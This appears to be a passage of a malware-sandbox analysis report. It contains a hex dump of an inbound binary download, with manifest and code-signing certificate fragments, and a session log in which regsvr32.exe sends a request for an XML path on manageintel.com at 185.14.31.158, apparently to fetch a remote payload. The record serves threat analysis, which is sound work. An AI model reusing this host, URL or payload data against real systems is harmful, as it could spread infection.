2c 13 ae 03 f8 b2 43 0c 6d e1 28 68 74 Data Ascii: ~f<}'!F3!4C\|/?\JlouKCbmV*7IE!Vt-9nH aX_n:w@cRh6m6l\x '<I{e`z<E05vFhAvkJL[k=~v:<()jk,%^`p+n0M?_6wjPCe,Cm(ht
2022-01-30 12:43:46 UTC	1923	IN	Data Raw: 0c 24 6e 19 0a 98 ef 20 49 53 52 2b 4f e6 b9 8a 1d e7 31 53 47 3b b7 ba 46 c5 8c 0b 36 85 c8 3f 61 77 4e 98 5a 42 63 2d 3c ea 87 80 ec 65 c5 f2 a6 b3 1a 81 5a 7b 15 72 bc 91 0e 33 87 be 11 04 1c d9 ba 90 36 a5 87 34 45 b5 82 88 40 e4 59 d1 12 74 3d ef ec 13 81 0a a7 11 cc 93 7a 6b f1 bb 90 96 4a dd 12 06 2b 2a 75 0f 12 77 64 27 39 dc 10 e9 39 53 06 72 04 43 56 cf a3 8b 3b 17 c4 da 25 1d 30 10 6d ab f5 2f 03 c8 58 06 99 9c e9 ad 59 e4 99 94 34 1d b1 4f 51 bd 68 92 d5 bf ae be 95 42 1f c2 65 05 ef 0a f7 4e ef 3d 20 26 c1 5f 2d 04 1a a7 30 f9 65 e4 2a b9 1d 81 1b 20 78 9b a4 a5 15 58 bf 69 03 9a 00 5d c7 c7 1f c2 56 16 df 63 a9 91 7a f9 18 d8 f8 11 55 32 e0 3b 24 16 68 e5 91 ea 8d d9 08 3b 4a e0 38 8b e6 f3 cf 06 15 24 2a 9a 58 f0 26 4a 3b 76 b4 3c ed a4 82 Data Ascii: $n ISR+O1SG;F6?awNZBc-<eZ{r364E@Yt=zkJ+uwd'99SrCV;%0m/XY4OQhBeN= &_-0e xXi]VczU2;$h;J8$*X&J;v<
2022-01-30 12:43:46 UTC	1931	IN	Data Raw: 80 75 29 fa 15 94 a2 02 d7 cb 8c 41 b5 db 49 aa 0b 6a b6 2d 31 61 c6 96 b5 f4 a5 8e a2 62 29 5f d1 2c b4 8e f3 db 0a 5e 6a 74 b0 8b a0 37 bc 21 20 00 14 b1 50 4a 09 6d 0b d7 fa 02 06 70 6f 4a 0c 16 27 ea 96 8a 10 94 60 82 13 68 d5 d0 2d cd f5 8a df 02 5c 5e ea e1 56 f3 47 37 c1 c4 1c b6 81 ab 3c 04 42 e8 82 49 3d 8d d2 3a 59 54 01 e3 0a db 64 53 28 26 2d ae 2c c0 76 58 e4 2c c3 06 82 10 29 c0 5e cb ec 34 0a 00 66 b1 33 a6 20 77 d4 fd 40 0b 88 c3 ec 4b 83 11 8a 06 45 92 d6 d8 a9 55 2b 90 32 f4 d5 48 15 68 d7 74 57 b6 4a 70 cf d8 7d 88 28 fb de d0 9e 85 ab dd c5 a9 9d de 80 85 b0 be bd 0a 34 4b b7 ae f5 5d 12 3f 95 8e 11 29 1f bd 5d 2b d7 41 f6 19 ff 02 97 0e 84 6c 38 2d 07 98 2b bc 51 9b b7 9a a4 20 16 fd 86 04 17 c0 89 84 92 14 a3 6f 14 cf 6d df cf 3c 2f Data Ascii: u)AIj-1ab)_,^jt7! PJmpoJ'`h-\^VG7<BI=:YTdS(&-,vX,)^4f3 w@KEU+2HhtWJp}(4K]?)]+Al8-+Q om</
2022-01-30 12:43:46 UTC	1939	IN	Data Raw: ab 6f 84 01 f3 18 fd fc 7b 82 28 13 fd 3f 3a 5c f0 36 60 86 1a 86 89 9d 21 3d 00 8d ec 29 c4 9a d2 49 75 5a 3f 01 60 e2 4f 32 70 d4 3e c9 fb 9f 5f fb 4e 57 43 b6 0b 33 02 30 89 2d 4d b6 4e 57 19 fa d9 f3 ee 23 18 13 5a 47 63 27 30 9c 65 ad 33 e6 70 9b e5 fa cb 36 13 ef c4 a9 18 44 92 fd 50 c2 2b 44 9f 74 06 6d 04 63 b5 84 2d 85 d7 9f dc 64 bf ce 82 da a7 3c f2 0d d0 77 70 6a fe 90 e3 f7 70 d2 df ea 64 24 86 4a b1 b6 9f af f9 23 ef ce ec dc 63 21 67 12 b3 43 84 7d d0 4c 70 05 41 05 f1 4c 1c 26 83 03 34 b9 6d d5 ee 28 31 30 db 57 da ca dd 79 64 26 12 16 61 b7 3f 6e 8e dd 25 96 d0 1e 8b b8 e4 b4 80 c3 bf 67 49 af 2f 0d cb ff 9d e9 b5 e1 92 23 94 4c 85 1b 51 49 f6 4c d0 12 3e eb 49 b0 07 9e 69 7c f1 96 50 ff b1 01 64 33 5e 97 72 62 86 a9 75 cd 83 d3 f3 48 56 Data Ascii: o{(?:\6`!=)IuZ?`O2p>_NWC30-MNW#ZGc'0e3p6DP+Dtmc-d<wpjpd$J#c!gC}LpAL&4m(10Wyd&a?n%gI/#LQIL>Ii\|Pd3^rbuHV
2022-01-30 12:43:46 UTC	1947	IN	Data Raw: cb ad 14 d7 39 89 4b 82 c9 ed 99 1e 4c 94 e3 fe 88 49 d8 fb 8e e5 da 95 57 e4 84 2e ad 7a 9a 21 38 b6 20 8c d1 e2 6f 99 8c b1 8e df f1 b3 86 3a 41 26 d8 51 66 7a 01 bc 80 2f f9 c7 8b 3e 4c 79 70 c2 d7 9d af 5a 54 3e 1b 8b 6b 37 0d 57 6c a6 a9 50 d4 ca 3c b2 d4 65 8b 52 39 c2 92 7b 57 f6 95 a7 02 81 c7 d6 d2 9b 8e 56 b9 48 58 cd 28 39 41 63 4e 66 6e a5 b4 7b 9a bc 4f 8f dc a0 29 61 13 ca 8b d1 ac 8f a9 62 db a1 fb 3f 6e ff b3 bc e6 1e 3d dc 97 e2 1c 0a 4f 25 a5 1c 5d 6e 63 74 77 87 7a 38 36 e3 56 62 d1 71 3e 05 35 d3 d0 3a ed ee ba a9 79 eb 96 09 6c b6 24 f5 7a 81 56 ca 9d eb 53 e6 8a d8 e9 bc 84 d0 fd 86 68 bf f2 3b bb fd e7 74 dd dc f7 19 1d 76 4a 97 3e 3e f9 b6 8e 81 ea e7 b1 fe d5 df cf ea 55 46 de 1a 34 d1 70 3d f0 ff e2 73 08 be 20 9c 43 8a 57 d5 e4 Data Ascii: 9KLIW.z!8 o:A&Qfz/>LypZT>k7WlP<eR9{WVHX(9AcNfn{O)ab?n=O%]nctwz86Vbq>5:yl$zVSh;tvJ>>UF4p=s CW
2022-01-30 12:43:46 UTC	1954	IN	Data Raw: 85 d0 46 6e 57 bd 34 5d a1 6f cf 57 da 01 63 4b 85 33 26 9a ef 22 ee 14 86 34 8e 90 2b 20 8a 31 c8 a4 38 66 7f be c6 58 e3 c9 67 e1 3f ce ca 65 53 77 97 c2 98 48 59 61 75 d8 51 ac 09 da 78 41 e7 64 c8 09 fe b4 9d f8 64 dd 95 2d bb 83 f0 93 46 aa 57 ef 3c e1 68 b3 25 96 9c 03 06 10 a7 45 d4 b9 0c 0e 17 52 e5 a8 7e 8e a9 ef d5 81 5c d9 5a 9d 24 33 a1 83 7c c8 0d cf 12 b9 58 e5 14 cf 13 68 a5 cb 86 b1 1a fa 91 e6 7c 80 2e e6 6e 00 d9 a9 ec 9b 3e 48 33 45 08 76 b2 79 06 cd 41 46 82 f0 a0 3b ff ab 3a ae 4f 1f 24 b1 e0 14 d6 22 39 7e 21 8c 29 19 2d ba 16 62 62 eb 24 13 53 f8 e4 9f 85 e6 95 7d 51 49 c6 33 e2 23 59 81 98 bc ee 28 ad 10 84 a8 85 d6 0d 8e 7b 3b cb a5 0f 02 23 32 50 d1 24 8d a4 57 9e 66 d2 9a 9a ce 60 b6 ab f6 21 d6 d4 84 43 87 56 fd 90 31 fb 49 cd Data Ascii: FnW4]oWcK3&"4+ 18fXg?eSwHYauQxAdd-FW<h%ER~\Z$3\|Xh\|.n>H3EvyAF;:O$"9~!)-bb$S}QI3#Y({;#2P$Wf`!CV1I
2022-01-30 12:43:46 UTC	1962	IN	Data Raw: 60 78 a7 97 44 d0 0f 8d 31 53 f2 0d f0 1e eb 24 53 e6 5e b7 e1 dd 5f 21 89 57 93 7b e4 87 25 83 8f 58 3a 06 11 59 e5 71 4d 6b d9 f6 07 c6 f5 94 5c 93 f3 bb 31 15 19 44 e2 3d 45 a5 91 36 a4 11 33 25 94 48 d9 6a 0b c2 f3 0b a5 c7 35 01 e4 99 ea f6 65 5c 7f 62 50 3a 7e d9 4e 8b c4 a3 f3 6d f9 ba 47 07 3c b5 f2 b2 4e 60 b8 af 2e f6 29 e7 8f 37 46 5d 8c c0 60 21 ca dc 4c 42 cf 00 a9 1e ca d6 a8 b7 19 a4 9c ec 84 c7 c8 15 0e 78 67 81 08 16 02 93 98 80 f1 05 b3 56 d3 55 3a 48 ad 93 2f 4f 30 ac b1 2d 4b b8 47 52 05 f1 5f 37 83 5a a0 71 e7 6d 96 c2 01 87 f1 47 0e ce 79 af 7a d7 78 7b 0c 74 b1 5c bf 12 b6 b9 54 80 c9 c6 fc ca 58 2d 5e 3c d2 56 09 f5 80 95 31 05 b1 8b 83 40 a6 8d 86 52 ad 9e e3 00 59 3f 79 b4 7d 98 b9 de 4b b8 06 c4 b7 79 61 a2 c6 f7 62 5b 91 6e 23 Data Ascii: `xD1S$S^_!W{%X:YqMk\1D=E63%Hj5e\bP:~NmG<N`.)7F]`!LBxgVU:H/O0-KGR_7ZqmGyzx{t\TX-^<V1@RY?y}Kyab[n#
2022-01-30 12:43:46 UTC	1970	IN	Data Raw: 3c c3 e6 fa 12 06 1a 11 94 6b c1 16 47 07 04 67 e8 f0 d9 d1 74 6b 34 02 c6 9e 9f 00 fa f5 4c af 5a 0c a7 d5 6a 95 66 da b3 1f b6 6e b2 e6 a3 ab 9b c5 df f6 dc 4a fc 1c 82 9a 66 5f c9 48 e5 db 6c 44 5e 46 f7 23 39 01 d4 4b 0e a3 c7 c9 dc fb 62 b3 de aa 66 bb b9 42 e9 6a 56 46 ba 29 58 46 34 fd 4a 2b ab 76 1d 63 55 79 62 97 f0 ae 8b bb 06 07 58 8a f8 99 e6 21 5a 29 d4 60 df cb 7a c8 22 e0 f4 ae 67 68 a9 23 4d 94 a5 30 39 c8 52 16 33 53 56 b7 30 26 1f 4c 8e 08 b4 05 2f 14 4e eb 7e 80 d3 ba a8 e5 12 43 9f 08 c7 a3 78 ee 9f 78 e2 5a ce c6 e7 65 96 9c 51 73 4b c9 50 58 93 5f 08 46 34 12 e8 6e 67 2a 58 f7 dd d8 25 08 cc 8a 6e e9 25 af 5a 62 93 2a 60 9c bc 1f 03 36 4c be 9d d8 de 1c 25 6f 4a a4 20 fc ec 3d a3 35 2d 78 1a 66 11 ad 17 15 58 37 b0 7f 17 b6 a9 71 ba Data Ascii: <kGgtk4LZjfnJf_HlD^F#9KbfBjVF)XF4J+vcUybX!Z)`z"gh#M09R3SV0&L/N~CxxZeQsKPX_F4ngX%n%Zb`6L%oJ =5-xfX7q
2022-01-30 12:43:46 UTC	1978	IN	Data Raw: e9 05 90 a0 b0 2b 80 e8 95 88 94 ec c1 04 6c 8a 04 0d f4 58 dc 39 37 76 07 b1 7b dd c2 0b db 9f 7f f6 24 36 ee 5b 6e a3 80 23 8e d2 1c 00 62 6c 98 24 19 8c be 79 ea 3b 06 9b e2 e7 7b e6 05 7e eb 4c 70 46 53 e0 31 9d 19 57 7b 00 5b 51 11 93 20 86 b8 88 78 6d 5e 52 c0 fc 52 4b 4c 03 ea f8 7c 22 2a a0 43 82 df d4 c1 44 ba 6c e8 39 25 aa 08 82 61 78 68 48 00 c1 08 d0 77 20 ac ba 2c 98 87 0f 84 22 49 9c c4 a2 24 e5 e2 28 15 84 16 e6 89 18 09 1c d9 6c ea c6 39 5d 0a 2d 9b bd 84 9f cd f9 17 8d 7e 7f a4 3f fc d8 2f 86 d7 12 64 1b f8 fe 12 f2 e6 29 ea 75 26 ec 87 86 5a 7e e2 94 10 a0 88 ce 9c 7c 54 22 eb e2 cb 66 84 7f 2a b6 18 ca 4c 48 cf d8 b1 b8 41 34 49 0a 50 13 d2 29 29 4e 0a 3d b0 33 17 72 30 65 f6 a8 4e f6 94 ca ad 62 17 a5 ab 09 0b 95 86 9e 8a 1f d4 13 23 Data Ascii: +lX97v{$6[n#bl$y;{~LpFS1W{[Q xm^RRKL\|"CDl9%axhHw ,"I$(l9]-~?/d)u&Z~\|T"fLHA4IP))N=3r0eNb#
2022-01-30 12:43:46 UTC	1986	IN	Data Raw: 52 fd 6c 37 6a 0e 57 17 17 17 dd d4 83 6d a7 52 44 7a ed c8 2c d9 3c ab 06 30 bc fb ab 76 c3 2b 8b 3b 91 b9 e5 ab 49 65 ba 70 47 0b 3c 1c b8 37 a1 54 0f b3 0f 8f ca aa 87 a4 a9 c7 e7 65 39 13 fb a7 2f e3 4c 66 ad a3 b9 3a 40 27 59 4a 8f f8 64 1e ea 86 4f 49 d3 3b 11 4d 0d 92 7c 84 a8 33 12 d7 fc f2 eb f8 b2 f8 cd 72 5a 36 9b f9 32 21 90 f1 48 e6 00 75 e8 1b 99 bd c1 28 a5 04 8c 2b 91 24 d3 24 65 ea 02 1e ad b6 1c bb b9 0f ec 23 01 02 37 42 71 1f 32 9a 9a 8c 99 02 69 09 e0 88 b1 40 c2 bd e4 b8 d9 46 6c 4a 4b 63 92 cd 76 b3 12 9d 73 1b 75 08 ad 14 45 dd 1a fc 10 19 d7 cd 4b 62 e8 29 b2 fd fc 8e 61 0b ab 9b 8c be 1e 8a b0 29 fc 93 cb 36 c3 a8 0c 83 ff 3a fc bf 81 9e d6 0c 0d 69 30 63 c7 c3 cf 9f 7b 60 71 db dc 68 4f 01 0f 04 70 fc 86 fb a4 7d 4d 4f 73 4a 2e Data Ascii: Rl7jWmRDz,<0v+;IepG<7Te9/Lf:@'YJdOI;M\|3rZ62!Hu(+$$e#7Bq2i@FlJKcvsuEKb)a)6:i0c{`qhOp}MOsJ.
2022-01-30 12:43:46 UTC	1993	IN	Data Raw: 3c 49 0a de ce 0a 91 3a 53 ad 0a 44 da 02 70 49 06 3c 64 f1 aa df e3 ad 10 95 93 f6 13 74 51 ba 22 c3 8f e7 46 7b af 9a a2 d4 64 87 d3 f4 34 6f f2 07 20 5e 9d 93 7c 5f df 17 7d a1 fe 90 a0 5e f6 c2 ea bd e2 92 07 94 8f 1e 96 a0 44 29 49 65 17 65 f7 44 7a 2a 69 82 33 cc 77 f3 b6 f6 bd 5a c2 c3 29 d9 a2 69 ee 16 b1 53 f7 aa db 5e 6e b3 27 33 c3 02 9c 90 ab 57 ad 4f 42 c9 3c b5 d3 c0 68 28 d1 aa 3a 69 2a 8e 63 d4 e3 79 11 fc da 09 04 0a 4b a8 d1 03 ca 43 ff 6d 75 46 b0 58 ff 55 e1 7f 61 80 81 95 15 46 21 cb 79 38 b8 57 cc ac 6b 48 1a 63 c6 4f 1e c0 5a 2c 62 b8 d5 1f 2e a6 44 4c 4a 49 aa c1 28 c4 91 8b 64 c9 2a 03 e7 72 ce c0 10 93 b2 a5 59 44 1d 3a dd c7 4f 96 c1 91 02 f6 aa 5d e7 f8 94 02 82 c7 30 e1 13 d2 1d 8e cb fd cf 0f c0 55 e0 2f 78 d2 49 64 4a 9f 41 Data Ascii: <I:SDpI<dtQ"F{d4o ^\|_}^D)IeeDzi3wZ)iS^n'3WOB<h(:icyKCmuFXUaF!y8WkHcOZ,b.DLJI(d*rYD:O]0U/xIdJA
2022-01-30 12:43:46 UTC	2001	IN	Data Raw: 94 e8 fe 2c 47 5e f7 5f 5c 7c 47 1f a7 eb b5 e4 33 ff de b3 5a ba 50 fe 4b be 6d 35 93 52 58 a8 9c f3 4c e2 f8 a8 1b ea e2 df 75 4c 6a 8f ee ff 34 aa 38 3b 3c 13 6a f9 22 80 1a 5e 69 8f 93 f3 ae 77 f6 d5 f4 fe 09 73 72 fa ef f9 9c be 9d d7 6b ee 3a 87 68 63 7d 7c 34 c7 d4 93 dc 51 4b 75 33 5f 4f 3c d1 9c ca e9 74 a0 4b c8 ee 34 e9 6d 16 cd 7a 40 fb b0 a6 e9 8b 74 1f a2 3c fc dc cd db 8f 67 85 75 af b9 e9 88 cd 99 9a c7 5b 81 d9 fa aa 97 a6 9f 9f cf 30 be 23 13 f3 92 f6 51 99 b3 8f a5 5e 75 ab b9 7f 11 c1 d2 f5 0f 45 6d df fb bb 7b 39 eb 5f 1d b0 f2 1f fb a2 df a5 10 47 d2 8f 14 70 ff cf de 3a a4 f9 f0 7f 94 9f ef e8 fa ed ec 27 aa f3 e3 41 3d e5 d1 2e e1 3c af ff 66 f5 91 63 ec e5 2c fd 47 52 0c 43 e5 eb 59 80 e5 d6 fc 76 3b 9f a3 96 da 63 aa f1 fa cc ba Data Ascii: ,G^_\\|G3ZPKm5RXLuLj48;<j"^iwsrk:hc}\|4QKu3_O<tK4mz@t<gu[0#Q^uEm{9_Gp:'A=.<fc,GRCYv;c
2022-01-30 12:43:46 UTC	2009	IN	Data Raw: ad 2f 27 36 a1 4c b4 a3 ab 02 1b 6b 13 65 a2 68 2b 50 d8 60 9b 51 26 0d d2 09 89 31 b6 77 32 39 4a 13 72 c4 6c ba c9 b1 61 36 a1 26 d2 b7 4a 91 0d b6 09 70 c2 9c ae a8 6c b7 4d 69 89 81 ba 50 cd 72 9b 42 26 47 ea 42 37 d4 6d 2a 4c 6c 0c 4d c8 13 bc 5b 1d d0 c6 db 84 98 d8 aa db 4a 1b 6f 13 bd c4 03 ae a1 9f 02 37 31 26 1a 71 26 04 09 e1 75 8b 44 63 dc 84 98 38 ac ab 7a 1b 71 13 c5 44 d1 3a 21 b8 1a 37 26 26 0d b9 09 c5 02 b9 57 62 d2 31 9b 10 13 93 ba 42 c9 0d b9 09 62 62 51 17 a1 b9 32 37 1e 26 1d 84 09 31 c2 b9 ab 54 e9 b0 4d c8 89 cf 5d 86 ec c6 dd 84 2b 11 51 28 a1 bb 4a 37 11 26 34 0c 4d a8 13 d4 bc 06 f1 0d ba 09 30 b1 38 54 21 d3 5c 37 12 4c 38 f2 26 04 44 ec d1 c0 ab 03 37 a1 4c 68 f4 0a 14 38 ed 26 c0 c4 b1 57 90 d6 ba 9b 01 26 0e d7 84 b8 e8 dd Data Ascii: /'6Lkeh+P`Q&1w29Jrla6&JplMiPrB&GB7m*LlM[Jo71&q&uDc8zqD:!7&&Wb1BbbQ27&1TM]+Q(J7&4M08T!\7L8&D7Lh8&W&
2022-01-30 12:43:46 UTC	2017	IN	Data Raw: dc 65 e3 8f 5b 99 cc 38 52 2c 3e bf 87 e3 ca ee ee fd f9 8c b7 37 5c fe 21 a7 75 fc 68 ff ab 7a 18 9e 5e 71 e7 ed 7b bc 2b de 67 ce 0b 50 26 e9 56 a2 89 49 58 b9 d8 ec 8c 0b b8 69 17 3d 61 62 8c f5 91 df 5b 6e ba 45 35 9d 5a 17 1f cf 4d bc f6 ea 69 db 75 99 ce ec ec 22 76 58 54 34 6d 73 57 79 34 1e b1 22 f2 2b 8f c2 a1 38 d4 e0 e3 56 35 93 45 0d bd 1c 2f e5 7d c1 7a 4a ca 3c 4d e3 79 37 89 3d 5e dc 1d 39 7c 09 e1 fd 9f 2a 80 c5 06 58 ce 26 d6 74 1e 9f cd 67 1d 79 1c d5 e3 3a 03 19 96 3f 14 b2 20 d6 e5 89 e8 fd 6e 2e ca 70 45 bc cc 30 ec 11 3b a1 80 3f f2 4f 44 9c 65 db cd b9 5d d8 13 c6 a9 3a 59 e5 5b c8 56 8a 7b b4 ea b6 5c f6 25 49 3e da 40 1f f3 76 9e bb 9c 47 72 6a c4 59 fe 20 1b dc 2c e5 92 7f 6d 1a d0 d1 c1 fc 70 e5 a2 6f 9a a7 f3 59 c6 94 c5 e2 f8 Data Ascii: e[8R,>7\!uhz^q{+gP&VIXi=ab[nE5ZMiu"vXT4msWy4"+8V5E/}zJ<My7=^9\|*X&tgy:? n.pE0;?ODe]:Y[V{\%I>@vGrjY ,mpoY
2022-01-30 12:43:46 UTC	2025	IN	Data Raw: 62 c9 ab 49 35 1c 3a 62 74 74 b6 1d a9 ba af ca e7 ae bb da 27 f0 f6 55 8d 8d 3b 5e 6c f3 90 68 63 6a bc 0a 02 e0 2a 99 50 0e c4 7d ea e9 49 a8 a8 59 50 45 1d 43 c5 cc 39 03 6d 0c a1 1a b2 b5 71 1b 19 d7 90 5d e9 ad 09 18 c8 a6 db 53 c5 d7 da 13 71 13 4d 14 6b 50 5c 13 0b 61 f0 07 ba 4d 91 df 6b 5c d0 b3 56 b8 86 6e ac 71 c9 ef 0f 47 04 42 6b 89 1e 72 c2 f8 89 12 1a 72 af f6 c9 5e 4e 1a fe 5d aa 49 f5 5c eb 53 4f b0 77 1a d1 4c 95 9b 38 0a 8b 43 aa 91 f5 c4 a2 0a d4 48 a4 3c 9c f2 4a e0 1a d4 46 57 11 c0 24 1c d9 68 3a 42 1a 36 46 44 f8 04 3d 78 23 72 3b e4 bc 82 3d 56 b1 6a 44 ca da 11 22 43 cd 33 0f c0 9e ed b8 00 5f 0a 10 ad e7 43 8f 20 13 01 1e 47 8d 4e 02 a0 e5 dd 76 55 b5 7f bd 52 9d 08 aa f3 bc 10 36 73 6e f8 3d f6 2f 69 3c 95 c3 04 2e ea ca e0 a1 Data Ascii: bI5:btt'U;^lhcj*P}IYPEC9mq]SqMkP\aMk\VnqGBkrr^N]I\SOwL8CH<JFW$h:B6FD=x#r;=VjD"C3_C GNvUR6sn=/i<.
2022-01-30 12:43:46 UTC	2033	IN	Data Raw: d9 e6 b1 e8 59 ca fe 77 0d 46 e9 21 b7 d9 a9 a3 30 63 5d 87 f5 a8 0b 4b c0 e8 08 69 c6 84 8c 48 65 17 d2 47 77 b3 1b 6a 36 a1 a0 2c e9 f1 1e 75 f5 31 68 10 73 c0 71 8e 82 3f 59 09 7b 9e 96 b3 94 da 5d 57 ec b8 f1 c5 2a 94 dc 80 b2 33 86 45 ee 67 a0 3f fc 29 c3 19 23 ea 35 34 24 e7 fb 78 fb 51 86 e2 b1 98 88 95 75 91 f6 24 93 8a ac ba 6c 04 65 66 b2 cc 34 79 75 40 92 ff 87 b1 30 96 79 ca f2 8e 72 16 2f ae 71 ea 87 ed ac 11 73 2e d4 92 f9 68 b5 85 27 52 d3 60 ee fa 7f 7f d2 f1 d9 26 c6 9a 79 67 fd f5 fa 6e fe 3e b2 fb e8 df 1f 61 a6 25 91 a8 62 10 cc 32 a4 55 81 88 24 60 90 13 c0 af da 37 c0 62 b3 82 ed 92 8a cb 88 71 25 f3 00 47 0b 99 23 d5 b3 92 f3 84 c8 32 97 57 61 23 98 90 7b a6 1a 49 f5 03 86 97 d7 ba ec 31 e6 e7 45 d0 79 00 74 08 73 c0 58 6b a2 af 83 Data Ascii: YwF!0c]KiHeGwj6,u1hsq?Y{]W*3Eg?)#54$xQu$lef4yu@0yr/qs.h'R`&ygn>a%b2U$`7bq%G#2Wa#{I1EytsXk
2022-01-30 12:43:46 UTC	2040	IN	Data Raw: 00 3e 9c 00 00 26 4c 00 00 06 2c 00 00 0d 0c 00 00 19 fc 00 00 00 00 00 00 80 79 00 00 00 30 00 00 00 00 00 00 80 01 00 00 80 03 00 00 80 07 00 00 80 03 00 00 80 01 00 00 80 00 00 00 c0 00 00 00 80 01 00 00 00 01 00 00 10 01 00 00 a0 01 00 00 c0 01 00 00 e6 03 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 01 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 7f ff c0 00 7f e1 e0 00 7f ff f0 00 7f ff f0 30 20 00 f0 78 0f ff 70 f0 0f ff 81 e0 08 03 83 c0 08 03 87 80 08 43 8f 00 08 23 9e 00 08 1b 3c 00 08 0c 78 00 08 04 f0 00 0f f9 ef f8 07 c3 dc 3c 00 27 a7 fe 00 0f 7b fe 00 1e 00 1e 00 3d bf ee 07 f8 df f0 0f f1 60 70 1f e1 30 70 19 f1 08 70 10 f1 04 70 00 e1 00 70 00 e1 00 70 01 c1 00 70 03 01 Data Ascii: >&L,y0( @0 xpC#<x<'{=`p0pppppp
2022-01-30 12:43:46 UTC	2048	IN	Data Raw: 0a 20 20 20 20 20 20 20 3c 2f 64 70 69 41 77 61 72 65 6e 65 73 73 3e 0a 20 20 20 20 20 3c 2f 61 73 6d 76 33 3a 77 69 6e 64 6f 77 73 53 65 74 74 69 6e 67 73 3e 0a 20 20 20 3c 2f 61 73 6d 76 33 3a 61 70 70 6c 69 63 61 74 69 6f 6e 3e 0a 3c 2f 61 73 73 65 6d 62 6c 79 3e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: </dpiAwareness> </asmv3:windowsSettings> </asmv3:application></assembly>
2022-01-30 12:43:46 UTC	2056	IN	Data Raw: 0e 65 4f 6c 87 87 5e f3 6e a0 f9 75 a5 9b 40 e8 53 b2 27 9d 4a b9 c0 77 21 8d ff 87 f2 de bc 8c ef 17 df b7 49 0b d1 f2 6e 30 0b 1a 0e 4e 76 ed 11 fc f5 e9 56 b2 7d bf c7 6d 0a 93 8c a5 d0 c0 b6 1d be 3a 4e 94 a2 d7 6e 6c 0b c2 8a 7c fa 20 f3 c4 e4 e5 cd 0d a8 cb 91 92 b1 7c 85 ec b5 14 69 66 0e 82 e7 cd ce c8 2d a6 51 7f 21 c1 35 53 85 06 4a 5d 9f ad bb 1b 5f 74 30 82 05 e0 30 82 03 c8 a0 03 02 01 02 02 10 2e 7c 87 cc 0e 93 4a 52 fe 94 fd 1c b7 cd 34 af 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 81 85 31 0b 30 09 06 03 55 04 06 13 02 47 42 31 1b 30 19 06 03 55 04 08 13 12 47 72 65 61 74 65 72 20 4d 61 6e 63 68 65 73 74 65 72 31 10 30 0e 06 03 55 04 07 13 07 53 61 6c 66 6f 72 64 31 1a 30 18 06 03 55 04 0a 13 11 43 4f 4d 4f 44 4f 20 43 41 20 4c 69 6d Data Ascii: eOl^nu@S'Jw!In0NvV}m:Nnl\| \|if-Q!5SJ]_t00.\|JR40*H010UGB10UGreater Manchester10USalford10UCOMODO CA Lim
2022-01-30 12:43:46 UTC	2064	IN	Data Raw: 31 61 a9 45 79 8c 04 4e 62 a3 82 8a 0f 91 4b 2c 3d cb d2 d4 ca 15 72 b4 39 63 30 82 25 85 06 0a 2b 06 01 04 01 82 37 02 04 01 31 82 25 75 30 82 25 71 06 09 2a 86 48 86 f7 0d 01 07 02 a0 82 25 62 30 82 25 5e 02 01 01 31 0f 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 30 78 06 0a 2b 06 01 04 01 82 37 02 01 04 a0 6a 30 68 30 33 06 0a 2b 06 01 04 01 82 37 02 01 0f 30 25 03 01 00 a0 20 a2 1e 80 1c 00 3c 00 3c 00 3c 00 4f 00 62 00 73 00 6f 00 6c 00 65 00 74 00 65 00 3e 00 3e 00 3e 30 31 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20 98 88 ab 0a 03 49 0b d9 83 0a d4 9f 7d fa 96 48 30 a5 1e 10 95 5c e9 c1 a8 fc 52 0a 38 1a ff 7a a0 82 1e bd 30 82 05 d8 30 82 03 c0 a0 03 02 01 02 02 10 4c aa f9 ca db 63 6f e0 1f f7 4e d8 5b 03 86 9d 30 0d 06 09 2a 86 48 86 f7 Data Ascii: 1aEyNbK,=r9c0%+71%u0%qH%b0%^10`He0x+7j0h03+70% <<<Obsolete>>>010`He I}H0\R8z00LcoN[0H
2022-01-30 12:43:46 UTC	2072	IN	Data Raw: 2f b9 ee fa 2f f1 f1 8f fe 50 b8 78 dd 14 96 de 1c 0e 70 b0 2a 85 6a b1 6c 68 e9 2a e4 10 2b 6e 21 fd d3 7c 9d 37 e4 2a 06 d6 c3 f1 d7 68 e3 4f 07 79 81 08 13 fe b2 64 5e e9 b1 3c e6 d0 78 23 b2 09 2c e2 26 62 bf 3b a9 97 51 cc c7 44 32 81 b2 af cf df 31 82 06 0b 30 82 06 07 02 01 01 30 81 91 30 7d 31 0b 30 09 06 03 55 04 06 13 02 47 42 31 1b 30 19 06 03 55 04 08 13 12 47 72 65 61 74 65 72 20 4d 61 6e 63 68 65 73 74 65 72 31 10 30 0e 06 03 55 04 07 13 07 53 61 6c 66 6f 72 64 31 1a 30 18 06 03 55 04 0a 13 11 43 4f 4d 4f 44 4f 20 43 41 20 4c 69 6d 69 74 65 64 31 23 30 21 06 03 55 04 03 13 1a 43 4f 4d 4f 44 4f 20 52 53 41 20 43 6f 64 65 20 53 69 67 6e 69 6e 67 20 43 41 02 10 7c 11 18 cb ba dc 95 da 37 52 c4 6e 47 a2 74 38 30 0d 06 09 60 86 48 01 65 03 04 02 Data Ascii: //Pxpjlh+n!\|7*hOyd^<x#,&b;QD21000}10UGB10UGreater Manchester10USalford10UCOMODO CA Limited1#0!UCOMODO RSA Code Signing CA\|7RnGt80`He

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49846	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-30 12:44:50 UTC	2073	OUT	GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache
